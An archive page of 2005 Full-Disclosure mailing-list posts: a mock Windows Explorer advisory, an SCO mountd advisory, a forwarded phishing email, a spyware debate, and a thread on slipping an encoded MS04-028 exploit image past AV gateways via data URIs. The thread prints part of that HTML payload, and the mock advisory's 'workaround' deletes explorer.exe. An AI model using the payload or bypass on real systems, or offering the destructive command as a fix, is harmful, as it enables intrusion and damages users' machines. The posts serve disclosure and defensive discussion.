> - TEAM PWN4GE Security Advisory
> PWNED- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> - - -
> 
>   Severity: HIGH
>  Title: EXPLORER: Vulnerability in all versions of Windows
>  Explorer
>   Date: January 11, 2005
> 
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> -
> 
> Synopsis
> 
> 
> Multiple overflows have been found in Windows Explorer, potentially
> allowing a remote user to open Explorer and run files remotely.
> 
> 
> Background
> ==
> 
> Windows Explorer is an advanced browsing tool made by Microsoft. It
> is used in daily tasks to open folders, copy files, delete files,
> rename files and view files on a system. It is the foundation of the
> World Wide Web and used by billions worldwide. It runs on an array of
> machines.
> 
> 
> Affected versions
> =
> 
> All versions of Windows' Explorer are vulnerable
> 
> Description
> ===
> 
> Shogun Suzuki discovered that a remote user can connect to any
> machine via numerous exploits and use Windows Explorer to view files,
> rename files, delete files, change permissions on files stored on a
> remote machine that has been pwned.
> 
> Impact
> ==
> 
> A remote attacker could install something similar to PCAnywhere
> after exploiting Windows and use Windows' Explorer to view, copy
> and or open any file on a victims machine.
> 
> Workaround
> ==
> 
> On a command prompt: del C:\WINDOWS\explorer.exe

Isn't explorer the program wich "shows" you the desktop?
Just a clue: Use Open-, Net- or FreeBSD.
These OSs are good enought for all normal tasks you've to do.

Real Workaround: Change the OS 
There's no other way or you like to wait
5 months for a patch. You've to wait at least 4 weeks because MS don#t
provide patches just because there's something critical. Oh no.. they've
their "Patch-Day". Something like a game-show but even more worse
because you don't get patches for all holes even you did everything
right.

> License
> ===
> 
> Copyright 2005 TEAM PWN4GE
> 
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.

Mails are FREE...
But sometimes Linux-Users need licenses for everything...
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] UnixWare 7.1.4 UnixWare 7.1.3 UnixWare 7.1.1 : mountd remote denial of service

2005-01-11 Thread please_reply_to_security 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



__

SCO Security Advisory

Subject:UnixWare 7.1.4 UnixWare 7.1.3 UnixWare 7.1.1 : mountd 
remote denial of service
Advisory number:SCOSA-2005.1
Issue date: 2005 January 11
Cross reference:sr892156 fz530479 erg712731 CAN-2004-1039
__


1. Problem Description

mountd is not enabled by default. But when the NFS mountd service
is run by inetd, if a NFS mount related request is received
from the remote (or local) host, inetd will repeatedly
create the mountd process and as a result increasingly
consume memory. 

The Common Vulnerabilities and Exposures project (cve.mitre.org) 
has assigned the name CAN-2004-1039 to this issue.


2. Vulnerable Supported Versions

System  Binaries
--
UnixWare 7.1.4  /usr/lib/nfs/tmp/mountd
UnixWare 7.1.3  /usr/lib/nfs/tmp/mountd
UnixWare 7.1.1  /usr/lib/nfs/mountd

3. Solution

The proper solution is to install the latest packages.

4. UnixWare 7.1.4 / UnixWare 7.1.3

4.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.1

4.2 Verification

MD5 (erg712731.pkg.Z) = 69067669ac277725e8665ac02f955607

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools

4.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

Download erg712731.pkg.Z to the /var/spool/pkg directory

# uncompress /var/spool/pkg/erg712731.pkg.Z
# pkgadd -d /var/spool/pkg/erg712731.pkg


5. UnixWare 7.1.1

5.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.1


5.2 Verification

MD5 (erg712731.711.pkg.Z) = 4f7e3bba1e5381e28bef0894dc1d9ec1

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools


5.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

Download erg712731.711.pkg.Z to the /var/spool/pkg directory

# uncompress /var/spool/pkg/erg712731.711.pkg.Z
# pkgadd -d /var/spool/pkg/erg712731.711.pkg


6. References

Specific references for this advisory:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1039
http://www.nilesoft.co.kr/

SCO security resources:
http://www.sco.com/support/security/index.html

SCO security advisories via email
http://www.sco.com/support/forums/security.html

This security fix closes SCO incidents sr892156 fz530479
erg712731.


7. Disclaimer

SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers
intended to promote secure installation and use of SCO
products.


8. Acknowledgments

SCO would like to thank Yun Jonglim a security researcher
of NileSOFT, Ltd (www.nilesoft.co.kr) for reporting this
issue.

__

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.0 (SCO/UNIX_SVR5)

iD8DBQFB5GoCaqoBO7ipriERAkkJAJ4xVCkfRughdxUAYyXba4+w53f1mgCfZG5h
67uBgt3Pg945OMT262BZYZ0=
=SBR9
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MediaSentry false positives?

2005-01-11 Thread Kevin 
On Wed, 05 Jan 2005 13:00:41 +0100, Florian Weimer <[EMAIL PROTECTED]> wrote:
> Kevin Kadow wrote:
> > Has anybody received "Notice of claimed infringement" from MediaSentry
> > for IP addresses which, while registered to you or your organization,
> > are in a range not actively in use?
> 
> I've independently received another report of this problem.
> 
> > I see two likely possibilities -- either MediaSentry is not using due
> > diligence in verifying that the material for which they send
> > infringement notices is actually shared from the address they show in
> > the complaint,  or somebody on the Internet is spoofing BGP route
> > announcements for unused address space out of larger allocations.
> 
> RIPE doesn't have an announcement of the prefix, so I think
> MediaSentry was in error.
> 
> I don't think it makes sense for MediaSentry to check their findings
> more closely from a business perspective.  They don't try to download
> the infringing material to confirm that redistribution actually takes
> place, either.

Sounds like an opportunity to take down MediaSentry.

The "takedown" notices state the following:

] On behalf of , owner of the exclusive rights to the
] copyrighted material at issue in this notice, we hereby state, that
] we have a good faith belief that use of the material in the manner
] complained of is not authorized by , its respective
] agents, or the law.
]
] Also, we hereby state, under penalty of perjury, under the laws of
] the State of California and under the laws of the United States, that the
] information in this notification is accurate and that we are authorized 
] to act on behalf of the owner of the exclusive rights being infringed
] as set forth in this notification.

Given the references to "good faith" and "perjury" in the above text,
if the data collection methods employed by MediaSentry are
demonstrably faulty, falsely implicate source IP addresses not
actually participating in file sharing (not a spoofed BGP route,
rather a bogus entry in the Kazaa or eDonkey indexes showing the wrong
source IP), MediaSentry may no longer be protected by the "good faith"
clause?

Kevin
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure: Interesting but suspicious possible phishing mail

2005-01-11 Thread RandallM 
Have been getting a number of these come thru also at work. 
Of course all the users are asking me questions about these.
They all have the strange words, paragraphs, and questions like this one.
They really got my attention. I at first thought they were hidden messages
but
Not so as the one we receive come as text. 

thank you
Randall M
 
 

<|>--
<|>
<|>Message: 4
<|>Date: Tue, 11 Jan 2005 02:27:55 +
<|>From: "DAN MORRILL" <[EMAIL PROTECTED]>
<|>Subject: [Full-Disclosure] Interesting but suspicious possible
<|> phishing mail
<|>To: full-disclosure@lists.netsys.com
<|>Message-ID: <[EMAIL PROTECTED]>
<|>Content-Type: text/plain; format=flowed
<|>
<|>Hi folks,
<|>
<|>Got this really interesting mail in my box today, and 
<|>knowing that I haven't 
<|>used that e-mail address or ordered anything on line lately. 
<|>Wondering if it 
<|>might not be a phishing e-mail. Haven't seen anything like 
<|>this before. 
<|>Anyone see anything similar?
<|>r/
<|>Dan
<|>
<|>
<|>
<|>from :  Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
<|>Sent :  Monday, January 10, 2005 10:40 PM
<|>To :  "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
<|>CC :  [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
<|>[EMAIL PROTECTED], [EMAIL PROTECTED]
<|>Subject :  Shipping Notification, Tracking Number : 
<|>TCD461649887242ESB
<|>
<|>MIME-Version: 1.0
<|>Received: from msnmail2.uswest.net ([63.226.138.22]) by 
<|>mc10-f38.hotmail.com 
<|>with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
<|>Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -
<|>Received: from unknown (63.226.138.18) by 
<|>msnmail2.uswest.net with QMQP; 10 
<|>Jan 2005 22:45:55 -
<|>Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
<|>Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
<|>mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
<|>X-Message-Info: JGTYoYF78jHm2Kmrh/becsOSGajhcE+aqhdcaXLDOFI=
<|>Delivered-To: [EMAIL PROTECTED]
<|>X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
<|>Fuz1=4Fuz2=4
<|>Return-Path: [EMAIL PROTECTED]
<|>X-OriginalArrivalTime: 10 Jan 2005 22:45:54.0814 (UTC) 
<|>FILETIME=[24BA71E0:01C4F766]
<|>
<|>
<|>
<|>
<|>Content-Type: multipart/mixed; 
<|>boundary="-mpls-cmx-12.inet.qwest.net-1105397155-56110"
<|>
<|>
<|>Content-Type: text/plain
<|>
<|>
<|>This email was forwarded from your previous Qwest.net email address
<|>to your MSN email address.  To discontinue email forwarding for any
<|>future emails sent to your previous Qwest.net email address, please
<|>contact MSN Customer Service.
<|>
<|>
<|>
<|>
<|>
<|>Content-Type: message/rfc822
<|>Content-Description: forwarded message
<|>Content-Transfer-Encoding: 8bit
<|>Content-Disposition: inline
<|>
<|>
<|>From: Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
<|>To: "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
<|>Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
<|>[EMAIL PROTECTED], 
<|>[EMAIL PROTECTED]
<|>Subject: Shipping Notification, Tracking Number : TCD461649887242ESB
<|>Sent: Monday, January 10, 2005 10:40 PM
<|>MIME-Version: 1.0
<|>Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
<|>Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
<|>mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
<|>X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
<|>Fuz1=4Fuz2=4 Content-Type: multipart/alternative; 
<|>boundary="--Part_GRKDac7J6.oMXawOLoYO4"
<|>
<|>
<|>Content-Type: text/html; format=flowed; charset=iso-8859-15
<|>Content-Transfer-Encoding: quoted-printable
<|>
<|>Check your status Below:
<|>
<|>cov2pa.com/track.asp?cg=1&c=tc
<|>
<|>The illiterate of the 21st century will not be those who 
<|>cannot read and 
<|>write, but those who cannot learn, unlearn, and relearn. 
<|>Alvin Toffler
<|>Those police officers are practicing driving between the two 
<|>buildings.
<|>The illiterate of the 21st century will not be those who 
<|>cannot read and 
<|>write, but those who cannot learn, unlearn, and relearn. 
<|>Alvin Toffler
<|>Haven't the photographers already disliked praying?
<|>Few things are harder to put up with than the annoyance of a 
<|>good example.
<|>3
<|>When people are free to do as they please, they usually 
<|>imitate each other. 
<|>-Eric Hoffer (1902-1983)
<|>Have you already loved sleeping?
<|>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

2005-01-11 Thread Steven Rakick 
At this point I have no choice by to agree. 

So far I've had an opportunity to test this with Check
Point Interspect and McAfee IntruShield. Like you
said, (in my lab) both detected and block the
malicious image when it was formatted without RFC
2397, but when base64 encoded they were downloaded and
excuted there attack.

Basically it's looking like no security companies are
looking at data formatted in this fashion. I'm not
sure but it seems like you can probably transfer
anything you'd like by just changing the content type
and your anti-virus, IDS, application firewall or
whatever you're using at the network level would be
completely oblivious.






On Tue, 11 Jan 2005 14:58:43 -0500, Darren Bounds
<[EMAIL PROTECTED]> wrote:
> Hello Danny,
> 
> This vulnerability is only applicable to the HTTP
data while in
> transit. Once received by the client the image will
be rendered and
> subsequently detected if local AV software.
> 
> At the present time, I'm not aware of any AV, IDS or
IPS vendor that
> will detect malicious images imbedded in HTML in
this manner.
> 
> 
> Thank you,
> 
> Darren Bounds
> Intrusense, LLC.
> 
> --
> Intrusense - Securing Business As Usual
> 
> On Jan 11, 2005, at 2:14 PM, Danny wrote:
> 
> > On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
> > <[EMAIL PROTECTED]> wrote:
> >> -BEGIN PGP SIGNED MESSAGE-
> >> Hash: SHA1
> >>
> >> Multi-vendor AV gateway image inspection bypass
vulnerability
> >> January 10, 2005
> >>
> >> A vulnerability has been discovered which allows
a remote attacker to
> >> bypass anti-virus
> >> (as well other security technologies such as IDS
and IPS) inspection
> >> of
> >> HTTP image content.
> >>
> >> By leveraging techniques described in RFC 2397
for base64 encoding
> >> image content within
> >> the URL scheme. A remote attack may encode a
malicious image within
> >> the
> >> body of an HTML
> >> formatted document to circumvent content
inspection.
> >>
> >> For example:
> >>
> >>
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> >>
> >> The source code at the URL above will by default
create a JPEG image
> >> that will attempt (and fail
> >> without tweaking) to exploit the Microsoft
MS04-028 GDI+
> >> vulnerability.
> >> The image itself is detected
> >> by all AV gateway engines tested (Trend, Sophos
and McAfee), however,
> >> when the same image
> >> is base64 encoded using the technique described
in RFC 2397
> >> (documented
> >> below), inspection
> >> is not performed and is delivered rendered by the
client.
> >>
> >> While Microsoft Internet Explorer does not
support the RFC 2397 URL
> >> scheme; Firefox, Safari,
> >> Mozilla and Opera do and will render the data and
thus successfully
> >> execute the payload if the necessary
> >> OS and/or application patches have not been
applied.
> >>
> >> ## BEGIN HTML ##
> >>
> >> 
> >> 
> >>  >>
src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> >> gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> >> /
> >>
X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
> >> B
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/
> >> bAEMACAYGBwYFCAcHBwkJ
> >>
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv
> >> /b
> >>
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
> >> Iy
> >> MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/
> >> xAAfAAABBQEBAQEBAQAA
> >> AQIDBAUGBwgJCgv/
> >>
xAC1EAACAQMDAgQDBQUEBX0BAgMABBEFEiExQQYTUWEHInEUMoGR
> >>
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2
> >> Rl
> >>

Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

2005-01-11 Thread Dan Margolis 
On Tue, Jan 11, 2005 at 10:03:30PM +0100, devis wrote:
> It is prooved matter that spywares do exploits IE holes ( Iframes bugs, 
> Active X etc etc ). Do your work on a few and you will see. 

Perhaps some do, but generally speaking this is unnecessary for spyware
to exist, as I said before; spyware exists regardless of such
vulnerabilities. 

> Beside, you 
> missed the point entirely: if an user, just by clicking, can install 
> spyware on his machine, then the OS / browser is to blame, not the 
> actual (bad) code (exploiting it) floating around websites.

A user can install spyware with one click for the same reason he can
install a *good* application with one click. Having the user run every
day with install privileges is relatively irrelevant; if he owns the
machine, he will have the ability to install things. Being prompted for
an admin password (as in the case of OSX) hardly prevents a stupid user
from installing crap. 


> Once again, you are missing the point completely, if M$ didn't 'slack 
> code' their OS, spyware would :
> 1) not install

How do you intend to make spyware not install while still allowing the
user to install other things?

> 2) therefore not exist in the form, numbers and variety we know them

See above. 

> I'll give you a clue:
> try to get a 'tool bar' or some 'other added bonus' automagically on 
> bsd/unix/linux/solaris using any browser, on any site, clicking randomly.

I cannot do so from "clicking randomly," but I quite easily can simply
from clicking "OK" to the download prompt. Firefox installs plugins and
toolbars just as easily as IE does. 

> As you said,
> 'It's very, very difficult to prevent people from voluntarily installing 
> spyware on their own systems.' yes indeed, because MS made it that the 
> average joe is an admin therefore has supreme powers out of the box.

So we don't give the *owner* admin privileges? Mac does this, as does
Linux. I don't know of a single OS where the machine's owner does not,
by default, have admin access. 

> Usability costs security. Always has, always will.

Of course. But the ability to execute code is pretty much
non-negotiable. I will never buy a general purpose PC on which I cannot
run programs of my choosing. And if MS sold one as such, you would be
here complaining about that instead. 

The point is, spyware does not require OS vulnerabilities to be spyware,
and it likely, for a long time to come, never will. I never argued that
Windows is the most secure OS, however, only that spyware does not imply
bugs. And that point should, by now, be crystal clear. 
-- 
Dan
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Andrew Farmer 
On 11 Jan 2005, at 14:52, Team Pwnge wrote:
   ^
Nice start: you can't even spell your own name correctly.


Description
===
Shogun Suzuki discovered that a remote user can connect to any
machine via numerous exploits and use Windows Explorer to view files,
rename files, delete files, change permissions on files stored on a
remote machine that has been pwned.
Pray tell. An important element of disclosure is to actually disclose
something. This, however, depends on there actually being something
worth disclosing.

Impact
==
A remote attacker could install something similar to PCAnywhere
after exploiting Windows and use Windows' Explorer to view, copy
and or open any file on a victims machine.
... or, "after exploiting Windows", an attacker could just "view,
copy, and or open any file on a victims[sic] machine" without
Explorer's help.

Concerns?
=
Security is a primary focus of TEAM PWN4GE ...
Er... right.

... and ensuring the
progress of secure Windows machines be our dreams.
And grammar be you lacking.
Oh, wait. You probably haven't gotten to that in school yet. Never
mind.

... As security
concerns should be addressed to respective vendors, ...
Reasonable enough, I suppose...

... we feel the urge to bypass standards ...
Um... yeah. "We think that $X is good, so we aren't going to do it."

... and bring our common dreams of a secure homeland to the Interweb.
*SPLUTTER*


PGP.sig
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Fwd: Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable]

2005-01-11 Thread devis 
Dan Margolis wrote:
On Tue, Jan 11, 2005 at 10:03:30PM +0100, devis wrote:
 

It is prooved matter that spywares do exploits IE holes ( Iframes bugs, 
Active X etc etc ). Do your work on a few and you will see. 
   

Perhaps some do, but generally speaking this is unnecessary for spyware
to exist, as I said before; spyware exists regardless of such
vulnerabilities. 
Beside, you 
missed the point entirely: if an user, just by clicking, can install 
spyware on his machine, then the OS / browser is to blame, not the 
actual (bad) code (exploiting it) floating around websites.
 

A user can install spyware with one click for the same reason he can
install a *good* application with one click. 

Thats is where we do not agree. I do not beleive an user should be able 
to install anything. I have set up few unfortunates of my clients that 
get bugged randomly, with a 'user' limited user account and an admin 
account. Given you explain them why, they do understood perfectly and 
asked me why M$ didn't install in such a way. I answered that they 
prefer to expect their user base to be more stupid than able to comprehend.

Having the user run every
day with install privileges is relatively irrelevant; if he owns the
machine, he will have the ability to install things. Being prompted for
an admin password (as in the case of OSX) hardly prevents a stupid user
from installing crap. 

 

Once again, you are missing the point completely, if M$ didn't 'slack 
code' their OS, spyware would :
1) not install
   

How do you intend to make spyware not install while still allowing the
user to install other things?
 

see up there.
2) therefore not exist in the form, numbers and variety we know them
   

See above. 

 

I'll give you a clue:
try to get a 'tool bar' or some 'other added bonus' automagically on 
bsd/unix/linux/solaris using any browser, on any site, clicking randomly.
   

I cannot do so from "clicking randomly," but I quite easily can simply
from clicking "OK" to the download prompt. Firefox installs plugins and
toolbars just as easily as IE does. 

 

You speak without trying. Please go install 'Gator' or 'Alexa Whats 
related' on such a box. I see your point of using the firefox extensions 
/ software install panel but so far in the wild on unix machines ...no 
reports. If it ever get used on firefox for windows for example to 
install spyware, it is because there is a windows box behind it. Please 
find me ONE example of spyware in the wild that install on an unix 
browser. Write a POC if it doesn't exist and please show that unix 
spywares in the home directory of the user are efficient.

As you said,
'It's very, very difficult to prevent people from voluntarily installing 
spyware on their own systems.' yes indeed, because MS made it that the 
average joe is an admin therefore has supreme powers out of the box.
   

So we don't give the *owner* admin privileges? Mac does this, as does
Linux. I don't know of a single OS where the machine's owner does not,
by default, have admin access. 

 

No we don't. Beleive me, its 5 minutes talk making an user aware of 
another account on his computer reserved for administrative tasks ( new 
installs, updates, etc ).

Usability costs security. Always has, always will.
   

Of course. But the ability to execute code is pretty much
non-negotiable. I will never buy a general purpose PC on which I cannot
run programs of my choosing. And if MS sold one as such, you would be
here complaining about that instead. 

The point is, spyware does not require OS vulnerabilities to be spyware,
 

but it does to install and therefore do its task.
and it likely, for a long time to come, never will. I never argued that
Windows is the most secure OS, however, only that spyware does not imply
bugs. And that point should, by now, be crystal clear. 
 

Spyware does implies bugs and weakness. Once again, until you prooved 
that spyware out there in the wild, install or will install (in the next 
future) in other browsers, on unix, running a non priviledge account, i 
cannot agree with you. When you write a spyware you are not only gonna 
choose the most popular platform, but the most easy platform to do so. 
Spywares on windows exists not only because its the most popular OS, but 
mainly because it is trivial to adapt an installation of malware over a 
vulnerability ( remember how blaster spread ? ).

Basically, i am answering because you have given up on educating the 
average user, and this is plain wrong. Setting up right security 
practices out of the box, then explaining the average joe how to use his 
computer, would not seems just a tedious task now, if M$ had done it 
properly from the start. Educating the end user is still possible. We 
managed to tell them not to click random emails for the last few years, 
and some still do, but overall its a big improvement.

Not trusting the user to improve is a big mistake. not explaining why is 
equally a big mistake. The products got to change,

RE: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Paul Kurczaba 
Why not also delete KDE, Gnome and all the other desktops out there.


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Team Pwnge
Sent: Tuesday, January 11, 2005 5:52 PM
To: [EMAIL PROTECTED]; bugtraq@securityfocus.com;
full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
TEAM PWN4GE Security Advisory PWNED
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: HIGH
 Title: EXPLORER: Vulnerability in all versions of Windows Explorer
  Date: January 11, 2005

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple overflows have been found in Windows Explorer, potentially allowing
a remote user to open Explorer and run files remotely.


Background
==

Windows Explorer is an advanced browsing tool made by Microsoft. It is used
in daily tasks to open folders, copy files, delete files, rename files and
view files on a system. It is the foundation of the World Wide Web and used
by billions worldwide. It runs on an array of machines.


Affected versions
=

All versions of Windows' Explorer are vulnerable

Description
===

Shogun Suzuki discovered that a remote user can connect to any machine via
numerous exploits and use Windows Explorer to view files, rename files,
delete files, change permissions on files stored on a remote machine that
has been pwned.

Impact
==

A remote attacker could install something similar to PCAnywhere after
exploiting Windows and use Windows' Explorer to view, copy and or open any
file on a victims machine.

Workaround
==

On a command prompt: del C:\WINDOWS\explorer.exe


Concerns?
=

Security is a primary focus of TEAM PWN4GE and ensuring the progress of
secure Windows machines be our dreams. As security concerns should be
addressed to respective vendors, we feel the urge to bypass standards and
bring our common dreams of a secure homeland to the Interweb.

License
===

Copyright 2005 TEAM PWN4GE

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
--
___
Outgun.com free e-mail @ www.outgun.com Check out our Premium services -
POP3 downloading, e-mail forwarding, and 25MB mailboxes!

Powered by Outblaze

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] RE: Full-Disclosure: Interesting but suspicious possible phishing mail

2005-01-11 Thread jigmed pema 
Hi, i am new to the list therefore greetings and kudos to all first,
been monitoring this kind of strange mails  myself, they all land in my 
catchall inbox. What baffles me about them is just the same fact them 
being addressed to a mailaccount on one of my subdomains i never used so 
far (the site is not even up yet), and which is not existant on that 
domain, starting to hit me right some hours after i had this domain 
registered. They all come either from a bogus yahoo or otherwise 
suspicious (spoofed??) account, all to something like jwsch  
mysubdomain dot com. The same subdomainname is registered by me with the 
.org, .info, .net and .de extensions, those have not been addressed so 
far and i wonder?
Personally i think it's random spam to check if this domain or 
mailaccount on this domain are reachable, but i don't have proof for 
that yet.
I shall keep an eye on those suspicious stuff furtheron.

Thank you for letting me being part on here, regards,
Jigmed Pema
RandallM wrote:
Have been getting a number of these come thru also at work. 
Of course all the users are asking me questions about these.
They all have the strange words, paragraphs, and questions like this one.
They really got my attention. I at first thought they were hidden messages
but
Not so as the one we receive come as text. 

thank you
Randall M

<|>--
<|>
<|>Message: 4
<|>Date: Tue, 11 Jan 2005 02:27:55 +
<|>From: "DAN MORRILL" <[EMAIL PROTECTED]>
<|>Subject: [Full-Disclosure] Interesting but suspicious possible
<|>	phishing mail
<|>To: full-disclosure@lists.netsys.com
<|>Message-ID: <[EMAIL PROTECTED]>
<|>Content-Type: text/plain; format=flowed
<|>
<|>Hi folks,
<|>
<|>Got this really interesting mail in my box today, and 
<|>knowing that I haven't 
<|>used that e-mail address or ordered anything on line lately. 
<|>Wondering if it 
<|>might not be a phishing e-mail. Haven't seen anything like 
<|>this before. 
<|>Anyone see anything similar?
<|>r/
<|>Dan
<|>
<|>
<|>
<|>from :  Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
<|>Sent :  Monday, January 10, 2005 10:40 PM
<|>To :  "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
<|>CC :  [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
<|>[EMAIL PROTECTED], [EMAIL PROTECTED]
<|>Subject :  Shipping Notification, Tracking Number 

- - - - - - - -  snip  - - - - - - - - -  -
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] FW: MS Antispyware makes deal to leave Weatherbugalone

2005-01-11 Thread ALD, Aditya, Aditya Lalit Deshmukh 
> And the money payoff begins..

So looks like MS anti spyware would be just one more useless tool from
microsoft.
As a win32 kern programmer I find all the spyware removal buiness too time
consuming - if any one of them affects my machine they get weeded out with a
kern debugger. 
But there should be a way to automate the process. 

Looks like we do have to stick with our trusty debuggers, spybot and
ad-aware! 



Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
___
Full-Disclosure - We believe in it.
